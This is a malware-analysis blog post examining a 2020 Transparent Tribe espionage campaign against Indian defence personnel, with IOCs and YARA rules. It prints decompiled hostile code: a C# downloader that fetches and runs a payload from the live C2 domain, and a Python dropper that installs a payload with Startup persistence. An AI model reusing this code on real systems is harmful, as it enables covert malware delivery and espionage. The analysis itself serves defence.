# Transparent Tribe: Four Years Later **blog.yoroi.company/research/transparent-tribe-four-years-later** 02/21/2020 ## Introduction February 21, 2020 _Operation Transparent Tribe was first spotted by_ [Proofpoint Researchers in Feb 2016, in a series of espionages](https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf) operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RAT are capable of exfiltrate information, take screenshot and record webcam streams. This threat actor has been vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group are almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis. ## Technical Analysis Hash 662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553 Threat New Operation Transparent Tribe Campaign Brief Description Malicious macro document of the new Campaign of Transparent Tribe Ssdeep 24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe Table 1. Static information about the malicious macro ----- [The document presents itself as a request for a DSOP FUND (Defence Services Officers](https://pcdaopune.gov.in/web/faq_tab) [Provident Fund). It is a](https://www.bajajfinserv.in/all-about-pf-provident-funds) fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. The Found is a financial planning for defense personnel. The money is kept by the government and in return a “nonpermanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been setup as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise. ### Self-Extracting Macro Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection: ----- The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection. Then it is possible to deobfuscate them. ----- The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts: ----- ### The SilentCMD Module The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” [and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on](https://github.com/stbrenner/SilentCMD) GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file. The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp: ----- ### The Real Time Module The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: ``` using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Net; using System.Text; namespace Realtime { class Program { static void Main(string[] args) { WebClient wc = new WebClient(); wc.DownloadFile("http://www.awsyscloud.com/x64i.scr", @"c:\\programdata\\systemidleperf\\x64i.scr"); Process proc = new Process(); proc.StartInfo.FileName = Convert.ToString(args[0]); proc.StartInfo.Arguments = "/c " + Convert.ToString(args[1]); proc.StartInfo.UseShellExecute = false; proc.StartInfo.CreateNoWindow = false; proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; proc.Start(); Environment.Exit(0); //Application.Exit(); /* if (!proc.Start()) { //Console.WriteLine("Error starting"); return; }*/ //proc.WaitForExit(); } } } ``` The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives. ### The X64i.scr File ----- Hash 7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665 Threat New Operation Transparent Tribe Campaign Brief Description Python stub malware of the new Campaign of Transparent Tribe Ssdeep 196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7 Icon Table 2. Static information about the Pyhton Stub The icon of the executable let us understand that the malware has been forged through the usage of the tool [Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python](https://www.pyinstaller.org/) source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code. So, after the operation of reversing, the extracted code of the malware is the following: ----- ``` yp p import socket, time, os, struct, sys from ctypes.wintypes import HANDLE, DWORD import platform import ctypes import _winreg import time import os import platform import binascii import _winreg import subprocess bitstream3 = "PAYLOAD_ONE" bitstream4 = "PAYLOAD_TWO" oses = os.name systems = platform.system() releases = platform.release() architectures = platform.architecture()[0] def main(): try: runsameagain() except Exception as e: print str(e) def runsameagain(): global bitstream3 binstr = bytearray(binascii.unhexlify(bitstream3)) if not os.path.exists("c:\programdata\SppExtComTel"): os.makedirs("c:\programdata\SppExtComTel") WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr); bootup() subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance']) def rundifferentagain(): global bitstream4 binstr = bytearray(binascii.unhexlify(bitstream4)) if not os.path.exists("c:\programdata\SppExtComTel"): os.makedirs("c:\programdata\SppExtComTel") WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr); bootup() subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance']) def Streamers(): try: rundifferentagain() return 1 except Exception as e: print str(e) def WriteFile(filename,data): with open(filename,"wb") as output: output.write(data) def bootup(): try: from win32com.client import Dispatch from win32com.shell import shell,shellcon dpath = "c:\programdata\SppExtComTel" #print "before" Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0) com_path = os.path.join(Start_path, "SppExtComTel.lnk") target = os.path.join(dpath,"SppExtComTel.scr") wDir = dpath icon = os.path.join(dpath, "SppExtComTel.scr") shell = Dispatch('WScript.Shell') shortcut = shell.CreateShortCut(com_path) ``` ----- ``` g p g shortcut.WorkingDirectory = wDir shortcut.IconLocation = icon shortcut.save() #print "there" #return True except Exception, e: print str(e) if __name__ == "__main__": try: #print oses #print systems #print releases #print architectures if '.py' not in sys.argv[0]: #sys.exit() #print "nothign to do" if systems == 'Windows' and releases == "7": main() elif systems == 'Windows' and (releases == "8.1" or releases == "8"): Streamers() elif systems == 'Windows' and releases == "10": #print "Please use a 64 bit version of python" #print "entering streamers" Streamers() else: Streamers() except Exception as e: print str(e) ``` Code snippet 2 The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code. After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the creation of a LNK file inside the Startup folder. ### The RAT As previously stated, the malware payload is the core component of the malware implant. As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2. ----- The first operation is to provide to the C2 a list of the running processes on the victim machine: The method used to send the information to the C2 is the following: ----- Figure 11: C2 communication routine After that, the malware loops in a cycle and waits for some commands coming from the C2: Figure 12: Routine for the download of new modules When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs: [http[://awsyscloud[.com/[email protected]!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu[.dll](https://blog.yoroi.company/cdn-cgi/l/email-protection) [http[://awsyscloud[.com/[email protected]!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll](https://blog.yoroi.company/cdn-cgi/l/email-protection) The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs: [http[://awsyscloud[.com/[email protected]!aBbU0le8hiInks/B/3500/m1ssh0upUuchCukXanevPozlu[.dll](https://blog.yoroi.company/cdn-cgi/l/email-protection) [http[://awsyscloud[.com/[email protected]!aBbU0le8hiInks/D/3500/p2ehtHero0paSth3end.dll](https://blog.yoroi.company/cdn-cgi/l/email-protection) The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: ----- Figure 13: Evidence of the decrypting routine of the certificate The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: Figure 14: Sending routine of the malware The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it: Figure 15: Evidence of the hard coded AES key ----- The downloaded code has been encrypted through the Rijndael algorithm with a hard coded key. ## Conclusion Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The [decoy document presents itself as a request for a DSOP FUND (Defence Services Officers](https://pcdaopune.gov.in/web/faq_tab) [Provident Fund) a](https://www.bajajfinserv.in/all-about-pf-provident-funds) providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries. ## Indicators of Compromise Hashes 8e170fab8cdf11b83089706a2bf4a1748844693f4c6f465e7ba89131df089b48 113776d3cc8409da498e898bc5e0cafc1762ce1d49e1a86c56b4d841b06efdf8 39567c9bbbc038574fd1cf569f4f7cfd68403cd817984186b83098ded2433b2c 08c0c431f7f63136091854af58cd7f9e6d229f90a9b0fda813c52232c030f6ea b111a2fef2a5e89f5dc20d7115c0ac2aa65b3e708eec20a41c00316d14b47472 f718a8661be822e03ac31a4495f7f7bcd3f7685f97b44d81459f3f23abf0e376 198a5af2125c7c41f531a652d200c083a55a97dc541e3c0b5b253c7329949156 ee363abb00f2c72d8e6144d99244288fa30df4877de76ec533ad6c51bc81dfce 877426dee9c0954b6c6f7c29b288e97ab0c512fd23eb9ecb13653a15d91ca05a cecd41e4e88131a3af162df0239d26c3471658497392649e8dc214bf61939dde 0a9fb267567bc7011c766d034a127213d73db7182bb8b31af18e0b15d391b49e 2d2ee85092147f08db4ab93b2952e42a971c6c7491985419ac375feda8674c60 b0dfb366cc63b4051bd100e5f8d132c400f4c0845d142c723d9c83efd1c52c1f 7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665 c84b720430fa64e852740c810afc25cbaec5e4b03b4dea1d3669bc2fb0e54b97 Dropurl hxxp://www.[awsyscloud[.com/x64i[.scr Components m1ssh0upUuchCukXanevPozlu.dll p2ehtHero0paSth3end.dll C2 hxxp://www.[awsyscloud[.com/ Persistence Write LNK file inside startup menu ## Yara Rules ----- ``` p _ _ _ _ { meta: description = "Yara rule for the Transparent Tribe Malicious Macro Jan_2020 " author = "Yoroi - ZLab" last_updated = "2020-02-21" tlp = "white" category = "informational" strings: $a1 = {8B 92 BC BE 87 95 BF BD 83} $a2 = {D6 8C C7 68 D5 8D C0 69 D4 8E} $b1 = "161,36,31,130,137,165,44,167,244,55,198,100,241" condition: all of them } rule TransparentTribe_PythonStub_Jan_20 { meta: description = "Yara rule for the Transparent Tribe Python Stub Jan_2020 " author = "Yoroi - ZLab" last_updated = "2020-02-21" tlp = "white" category = "informational" strings: $a1 = {70 56 6B 77 86 FB D2 6D 2C} $a2 = {A2 43 F9 97 61 F4 E5 1F D7 02} $b1 = "bpyexpat.pyd" $b2 = "bmfc90u.dll" condition: uint16(0) == 0x5A4D and all of them and filesize > 7MB } rule TransparentTribe_CrimsonRAT_Jan_20 { meta: description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 " author = "Yoroi - ZLab" last_updated = "2020-02-21" tlp = "white" category = "informational" strings: $a1 = {03 06 11 24 03 06 11 20 03} $a2 = {B0 3F 5F 7F 11 D5 0A 3A 04} $b1 = "SppExtComTel" condition: uint16(0) == 0x5A4D and all of them and filesize > 7MB } rule TransparentTribe_MaliciousDLLModule_Jan_20 { meta: description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 " author = "Yoroi - ZLab" last_updated = "2020-02-21" tlp = "white" category = "informational" strings: $a1 = {00 F1 01 8D 19 71 00 F1 01 7D 06 71} $a2 = {86 08 4E 03 57 00 59 00 CC} $a3 = "6f6e6c79706172616e6f696473757276697665" ascii wide $a4 = "shemypolandar*kotlin" ascii wide $b1 = "FC4302A8973108F7B86565D5A49182DED2B0BF31" $b2 = "PrivateMemorySize64" $b3 = "Hi0-78LoupIks2jMn" wide condition: uint16(0) == 0x5A4D and (all of ($a*) or all of ($b*)) } ``` _This blog post was authored by Luigi Martire, Pietro Melillo and Antonio Pirozzi of Cybaze-Yoroi ZLAB_ -----